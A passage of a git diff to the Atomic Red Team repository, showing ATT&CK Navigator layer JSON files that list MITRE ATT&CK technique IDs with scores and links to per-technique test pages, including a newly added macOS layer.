Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 8b137891..19ebb1f9 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ - +{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1016","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1018","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"}]},{"techniqueID":"T1056.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View 